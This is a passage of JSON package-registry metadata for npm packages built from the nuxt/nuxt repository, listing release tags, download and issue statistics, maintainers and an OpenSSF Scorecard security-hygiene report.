","sha":"a8776de913a391bfd825b56cbd5ae655d3490240","kind":"commit","published_at":"2016-11-10T13:46:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"c97c4ec32e0b5a889bd3b95f5f18d251db202354","kind":"commit","published_at":"2016-11-10T02:38:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"d88948bdeac9cd3b8c8f1c1456198e666e49664e","kind":"commit","published_at":"2016-11-10T01:19:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.3.0/manifests"},{"name":"v0.2.6","sha":"18a2b57655a6be21a93949520a663825471fbd48","kind":"commit","published_at":"2016-11-09T22:59:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"a5780a09cae0a0109103bf660da96e479ec5ef73","kind":"commit","published_at":"2016-11-09T14:55:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"73bdfc03943799025def2b91f2402208126da453","kind":"commit","published_at":"2016-11-09T01:35:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"90a97d76ce938be645f82f538a268a83b4c9630d","kind":"commit","published_at":"2016-11-08T02:48:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"923b211a929392e7bb77e3e9326655229397ca13","kind":"commit","published_at":"2016-11-08T00:54:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"876054ed48764ef11278c27d1884d94c3153b05d","kind":"commit","published_at":"2016-11-08T00:18:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"9ebbb14eabd73ed64871d0ee59fafaad914e95f2","kind":"commit","published_at":"2016-11-07T22:26:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.2.0/manifests"}]},"repo_metadata_updated_at":"2024-10-29T22:51:36.952Z","dependent_packages_count":0,"downloads":10636,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":37.22123301104748,"dependent_packages_count":52.61855168586287,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":44.91989234845518},"purl":"pkg:npm/%40nuxt/webpack-builder-nightly","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nuxt/webpack-builder-nightly","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nuxt/webpack-builder-nightly","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nuxt/webpack-builder-nightly/dependencies","status":null,"funding_links":["https://github.com/sponsors/nuxt","https://opencollective.com/nuxtjs"],"critical":null,"issue_metadata":{"last_synced_at":"2024-10-29T15:44:34.308Z","issues_count":5866,"pull_requests_count":3404,"avg_time_to_close_issue":9336455.487222355,"avg_time_to_close_pull_request":862062.3253012048,"issues_closed_count":4166,"pull_requests_closed_count":3069,"pull_request_authors_count":452,"issue_authors_count":2655,"avg_comments_per_issue":5.084896010910331,"avg_comments_per_pull_request":2.099882491186839,"merged_pull_requests_count":2749,"bot_issues_count":1,"bot_pull_requests_count":1257,"past_year_issues_count":2725,"past_year_pull_requests_count":2325,"past_year_avg_time_to_close_issue":1465899.066102591,"past_year_avg_time_to_close_pull_request":278153.12717852095,"past_year_issues_closed_count":1881,"past_year_pull_requests_closed_count":2121,"past_year_pull_request_authors_count":310,"past_year_issue_authors_count":1437,"past_year_avg_comments_per_issue":3.424954128440367,"past_year_avg_comments_per_pull_request":2.0623655913978496,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":949,"past_year_merged_pull_requests_count":1933,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/issues","maintainers":[{"login":"danielroe","count":819,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":227,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"pi0","count":127,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"manniL","count":93,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":77,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"antfu","count":50,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"userquin","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"Atinux","count":40,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"Hebilicious","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"BobbieGoede","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"dargmuesli","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"warflash","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"ineshbose","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"farnabaz","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/farnabaz"},{"login":"madebyfabian","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"lihbr","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"clarkdo","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/clarkdo"},{"login":"arashsheyda","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"Diizzayy","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Diizzayy"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"},{"login":"vargasmesh","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vargasmesh"},{"login":"adhamfarrag","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/adhamfarrag"}],"active_maintainers":[{"login":"danielroe","count":497,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/danielroe"},{"login":"huang-julien","count":153,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huang-julien"},{"login":"manniL","count":56,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/manniL"},{"login":"DamianGlowala","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/DamianGlowala"},{"login":"userquin","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/userquin"},{"login":"antfu","count":24,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/antfu"},{"login":"BobbieGoede","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/BobbieGoede"},{"login":"pi0","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pi0"},{"login":"Atinux","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Atinux"},{"login":"ineshbose","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ineshbose"},{"login":"wattanx","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/wattanx"},{"login":"atinux","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/atinux"},{"login":"productdevbook","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/productdevbook"},{"login":"madebyfabian","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/madebyfabian"},{"login":"warflash","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/warflash"},{"login":"Hebilicious","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Hebilicious"},{"login":"lihbr","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lihbr"},{"login":"benjamincanac","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/benjamincanac"},{"login":"dargmuesli","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dargmuesli"},{"login":"arashsheyda","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arashsheyda"},{"login":"posva","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/posva"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack-builder-nightly/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack-builder-nightly/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack-builder-nightly/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack-builder-nightly/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack-builder-nightly/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fwebpack-builder-nightly/codemeta","maintainers":[{"uuid":"nuxt.bot","login":"nuxt.bot","name":null,"email":"pyapar+nuxtbot@gmail.com","url":null,"packages_count":22,"html_url":"https://www.npmjs.com/~nuxt.bot","role":null,"created_at":"2023-10-14T09:55:33.488Z","updated_at":"2023-10-14T09:55:33.488Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxt.bot/packages"},{"uuid":"pi0","login":"pi0","name":null,"email":"pyapar@gmail.com","url":null,"packages_count":689,"html_url":"https://www.npmjs.com/~pi0","role":null,"created_at":"2023-10-12T12:25:13.624Z","updated_at":"2023-10-12T12:25:13.624Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/pi0/packages"},{"uuid":"antfu","login":"antfu","name":null,"email":"anthonyfu117@hotmail.com","url":null,"packages_count":733,"html_url":"https://www.npmjs.com/~antfu","role":null,"created_at":"2023-10-12T12:25:13.527Z","updated_at":"2023-10-12T12:25:13.527Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/antfu/packages"},{"uuid":"atinux","login":"atinux","name":null,"email":"atinux@gmail.com","url":null,"packages_count":378,"html_url":"https://www.npmjs.com/~atinux","role":null,"created_at":"2023-10-12T12:25:13.581Z","updated_at":"2023-10-12T12:25:13.581Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/atinux/packages"},{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2023-10-12T12:25:13.709Z","updated_at":"2023-10-12T12:25:13.709Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"clarkdo","login":"clarkdo","name":null,"email":"clark.duxin@gmail.com","url":null,"packages_count":31,"html_url":"https://www.npmjs.com/~clarkdo","role":null,"created_at":"2023-10-12T12:25:13.660Z","updated_at":"2023-10-12T12:25:13.660Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/clarkdo/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-10-12T12:25:13.485Z","updated_at":"2023-10-12T12:25:13.485Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":11343195,"name":"@rsnuxt/server","ecosystem":"npm","description":null,"homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"rsnuxt","versions_count":17,"first_release_published_at":"2025-02-11T09:14:57.178Z","latest_release_published_at":"2025-10-11T04:55:26.273Z","latest_release_number":"0.5.11","last_synced_at":"2026-05-11T01:23:05.677Z","created_at":"2025-02-11T09:37:16.994Z","updated_at":"2026-05-11T01:23:05.677Z","registry_url":"https://www.npmjs.com/package/@rsnuxt/server","install_command":"npm install @rsnuxt/server","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"0.2.2-alpha.1":"0.2.2-alpha.1","latest":"0.5.11"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Full-Stack Vue Framework.","archived":false,"fork":false,"pushed_at":"2026-04-29T23:50:20.000Z","size":137431,"stargazers_count":60131,"open_issues_count":887,"forks_count":5588,"subscribers_count":774,"default_branch":"main","last_synced_at":"2026-04-30T01:14:24.889Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":"CODEOWNERS","security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2026-04-30T00:02:56.000Z","dependencies_parsed_at":"2026-03-18T13:06:30.670Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":7074,"total_committers":809,"mean_commits":8.744128553770086,"dds":0.6857506361323156,"last_synced_commit":"660f1720301b8d6487c89b6f86b4e7630573bca4"},"previous_names":["nuxt/nuxt.js","atinux/nuxt.js"],"tags_count":321,"template":false,"template_full_name":null,"purl":"pkg:github/nuxt/nuxt","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/sbom","scorecard":{"id":214668,"data":{"date":"2025-08-15T10:56:51Z","repo":{"name":"github.com/nuxt/nuxt","commit":"abf5d9e9f4a78a393a0ffbd8cfac8d24731217d6"},"scorecard":{"version":"v5.2.1","commit":"ab2f6e92482462fe66246d9e32f642855a691dc1"},"score":8.4,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 16 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#maintained"}},{"name":"Code-Review","score":6,"reason":"Found 14/23 approved changesets -- score normalized to 6","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#security-policy"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: jobLevel 'contents' permission set to 'read': .github/workflows/cache-cleanup.yml:18","Warn: jobLevel 'actions' permission set to 'write': .github/workflows/cache-cleanup.yml:17","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/changelog.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/ci.yml:76","Info: jobLevel 'actions' permission set to 'read': .github/workflows/ci.yml:75","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:20","Info: jobLevel 'contents' permission set to 'read': .github/workflows/scorecards.yml:29","Info: jobLevel 'actions' permission set to 'read': .github/workflows/scorecards.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/semantic-pull-requests.yml:15","Info: jobLevel 'pull-requests' permission set to 'read': .github/workflows/semantic-pull-requests.yml:16","Warn: jobLevel 'statuses' permission set to 'write': .github/workflows/semantic-pull-requests.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix-docs.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:9","Info: found token with 'none' permissions: .github/workflows/cache-cleanup.yml:1","Info: found token with 'none' permissions: .github/workflows/changelog.yml:1","Info: found token with 'none' permissions: .github/workflows/ci.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:15","Info: found token with 'none' permissions: .github/workflows/docs-check-links.yml:1","Info: found token with 'none' permissions: .github/workflows/docs-deploy.yml:1","Info: found token with 'none' permissions: .github/workflows/docs.yml:1","Info: found token with 'none' permissions: .github/workflows/label-pr.yml:1","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-monorepo.yml:22","Info: topLevel 'contents' permission set to 'read': .github/workflows/lint-workflows.yml:20","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-bridge.yml:1","Info: found token with 'none' permissions: .github/workflows/notify-nuxt-website.yml:1","Info: found token with 'none' permissions: .github/workflows/release.yml:1","Info: topLevel permissions set to 'read-all': .github/workflows/scorecards.yml:18","Info: found token with 'none' permissions: .github/workflows/semantic-pull-requests.yml:1","Info: found token with 'none' permissions: .github/workflows/team-triage.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":10,"reason":"all dependencies are pinned","details":["Info:  59 out of  59 GitHub-owned GitHubAction dependencies pinned","Info:  28 out of  28 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#signed-releases"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 22 commits out of 24 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":5,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'allow deletion' disabled on branch '3.x'","Info: 'force pushes' disabled on branch 'main'","Info: 'force pushes' disabled on branch '3.x'","Warn: 'branch protection settings apply to administrators' is disabled on branch 'main'","Warn: 'branch protection settings apply to administrators' is disabled on branch '3.x'","Warn: 'stale review dismissal' is disabled on branch 'main'","Warn: 'stale review dismissal' is disabled on branch '3.x'","Warn: required approving review count is 1 on branch 'main'","Warn: required approving review count is 1 on branch '3.x'","Info: codeowner review is required on branch 'main'","Info: codeowner review is required on branch '3.x'","Info: 'last push approval' is required to merge on branch 'main'","Info: 'last push approval' is required to merge on branch '3.x'","Warn: 'up-to-date branches' is disabled on branch 'main'","Warn: 'up-to-date branches' is disabled on branch '3.x'","Info: status check found to merge onto on branch 'main'","Info: status check found to merge onto on branch '3.x'","Info: PRs are required in order to make changes on branch 'main'","Info: PRs are required in order to make changes on branch '3.x'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":10,"reason":"24 out of 24 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 77 contributing companies or organizations","details":["Info: found contributions from: D2Arsenal, DescendantGG, Developmint, GitHub-Stars, HelloAsso, HubSpot, JabRef, Lottomerkury, MetridashCore, Strawbei, Tresjs, WinterTC55, Zettlr, acquiredigital, albionstatus, alibaba-aero, antfu-collective, antfu-sponsors, benevolt, bootstrap-vue, codecember-ink, ecosystem-ci, elk-zone, esbuild-kit, eslint-stylistic, fse-employability, github-beta, gridsome, gubutler, h3js, helloasso, intlify, jabama-co, javascript-compiler-hints, knightlyjs, krutie patel, leetchi, lottomerkury sp. z o.o., mash-up, masters-info-nantes, mdit-vue, myself, nitrojs, nuxt, nuxt-community, nuxt-contrib, nuxt-modules, nuxtlabs, oxc-project, passionatepeople, shikijs, singularit-de, slidevjs, tastejs, tsperf, twoslashes, type-challenges, unjs, unjs . @nitrojs . @h3js . @nuxt, unocss, unplugin, vercel, vite-pwa, vitejs, vitest-dev, voidzero-dev, vue-reactivity, vue-terminal, vuejs, vuejs @vitejs @vueuse, vuejs-jp, vuetifyjs, vueuse, we-dance, webfansplz-sponsors, wenyan-lang, windicss"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is 